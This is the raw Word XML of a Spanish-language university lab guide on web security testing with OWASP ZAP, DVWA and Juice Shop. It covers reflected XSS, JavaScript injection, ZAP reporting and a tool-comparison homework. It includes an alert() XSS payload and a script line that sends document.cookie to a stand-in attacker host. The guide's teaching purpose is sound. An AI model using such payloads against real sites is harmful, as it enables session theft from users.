    <w:p w14:paraId="66C5C42F" w14:textId="40DA79AC" w:rsidR="002A3500" w:rsidRPr="00DD1843" w:rsidRDefault="002A3500" w:rsidP="00DD1843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Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C042D25" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En DVWA, ir a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>XSS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5744B7C3" w14:textId="77777777" w:rsidR="002A3500" w:rsidRPr="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inyectar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A8D15" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verificar ejecución del script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01131EEC" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Explique cómo puede modificarse el script para robar cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5595F15E" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7459855F" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="295E7FA1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:ind w:left="72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&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-property"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>'http://attacker.com/steal.php?cookie='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-property"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29530F8B" w14:textId="7D322150" w:rsidR="002A3500" w:rsidRPr="00DD1843" w:rsidRDefault="002A3500" w:rsidP="00DD1843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Inyección de código JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728808FB" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Explorar inyecciones en campos de Juice Shop (e.g., nombre de usuario, comentarios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD7BF1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Usar ZAP para detectar vulnerabilidades persistentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118C902" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Demostrar cómo un JS malicioso puede enviar información confidencial a otro servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B61EE0" w14:textId="2F4F9EE4" w:rsidR="002A3500" w:rsidRPr="00DD1843" w:rsidRDefault="002A3500" w:rsidP="00DD1843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DD1843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Parte 4: Reporte de hallazgos con OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB593A" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Generar reporte automático desde ZAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B0ED1" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Generate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FE42E6F" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En el reporte, identificar y clasificar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD62F3D" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tipo de vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF2BF9" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nivel de severidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6D01E" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>URL afectada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8ACE83" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recomendación de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E770C8A" w14:textId="40F40239" w:rsidR="002A3500" w:rsidRPr="006347A1" w:rsidRDefault="002A3500" w:rsidP="006347A1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6347A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Actividad para investigación en casa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828C852" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Tema:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Comparación de herramientas de análisis de seguridad web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F99E8DA" w14:textId="216D2EA8" w:rsidR="002A3500" w:rsidRDefault="00AE18C2" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Se pide</w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:br/>
        <w:t xml:space="preserve">Investigar y comparar al menos 3 herramientas similares a OWASP ZAP (por ejemplo, </w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r w:rsidR="002A3500">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A3500">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Wapiti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A3500">
        <w:t>). Elaborar un informe de máximo 2 páginas incluyendo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E86BEB9" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Principales características</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F9CA4" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ventajas y desventajas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53392CD3" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Casos de uso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53796E0C" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comparativa con OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FA290" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Entrega:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Próxima clase como tarea individual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC600B3" w14:textId="79CBAA0E" w:rsidR="002A3500" w:rsidRPr="006347A1" w:rsidRDefault="002A3500" w:rsidP="006347A1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</w:pPr>
      <w:r w:rsidRPr="006347A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Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915A1B5" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OWASP ZAP es una herramienta potente para realizar análisis de seguridad en aplicaciones web sin costo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE94598" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplicaciones como DVWA y Juice Shop permiten experimentar en un entorno seguro con vulnerabilidades reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F8B79" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilidades como SQL Injection y XSS pueden tener impactos severos, incluyendo pérdida de datos o robo de sesiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A365DB9" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="002A3500">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Es esencial que los desarrolladores conozcan estas amenazas para prevenirlas desde la fase de diseño del software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF1577" w14:textId="16836D8F" w:rsidR="002A3500" w:rsidRPr="006347A1" w:rsidRDefault="002A3500" w:rsidP="006347A1">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006347A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="es-EC" w:eastAsia="es-EC"/>
        </w:rPr>
        <w:t>Referencias Bibliográficas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA772E9" w14:textId="77777777" w:rsidR="002A3500" w:rsidRPr="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP ZAP Project</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. https://www.zaproxy.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F03814" w14:textId="77777777" w:rsidR="002A3500" w:rsidRPr="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2023). </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP Juice Shop</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. https://owasp.org/www-project-juice-shop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA40C2A" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Digininja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2022). </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Damn Vulnerable Web Application (DVWA)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_new" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/digininja/DVWA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F738A3E" w14:textId="77777777" w:rsidR="002A3500" w:rsidRPr="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B1DFA" w14:textId="77777777" w:rsidR="002A3500" w:rsidRDefault="002A3500" w:rsidP="00BF7332">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scarfone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, K., &amp; Mell, P. (2007). </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Guide to Intrusion Detection and Prevention Systems (IDPS)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3500">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>NIST SP 800-94.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002A3500" w:rsidSect="00224558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20AC6" w14:textId="77777777" w:rsidR="00A13723" w:rsidRDefault="00A13723" w:rsidP="00791801">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F35345C" w14:textId="77777777" w:rsidR="00A13723" w:rsidRDefault="00A13723" w:rsidP="00791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0C11" w14:textId="429F2DAB" w:rsidR="00791801" w:rsidRPr="008C03B4" w:rsidRDefault="008C03B4">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:rPr>
        <w:lang w:val="es-EC"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="008C03B4">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:lang w:val="es-EC"/>
      </w:rPr>
      <w:t>Profesor</w:t>
    </w:r>
    <w:r w:rsidRPr="008C03B4">
      <w:rPr>
        <w:lang w:val="es-EC"/>
      </w:rPr>
      <w:t>:</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="es-EC"/>
      </w:rPr>
      <w:t xml:space="preserve"> Walter Fuertes, PhD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E2757" w14:textId="77777777" w:rsidR="00A13723" w:rsidRDefault="00A13723" w:rsidP="00791801">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1C434C05" w14:textId="77777777" w:rsidR="00A13723" w:rsidRDefault="00A13723" w:rsidP="00791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789E" w14:textId="2F8E0160" w:rsidR="00791801" w:rsidRDefault="00791801" w:rsidP="00791801">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D78196" wp14:editId="01991020">
          <wp:extent cx="2445385" cy="678521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267" cy="695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5CA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D0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6AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="953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3A02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="383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767D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B1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61C94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB2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1571"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77A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5D73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A30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90A50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE38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02C50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D50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421EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D582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62F7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D44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DC4F5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F0A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F3404"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="778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73A35"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="640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908EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="383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21BD3"/>
    <w:multiLevelType w:val="multilevel"/>
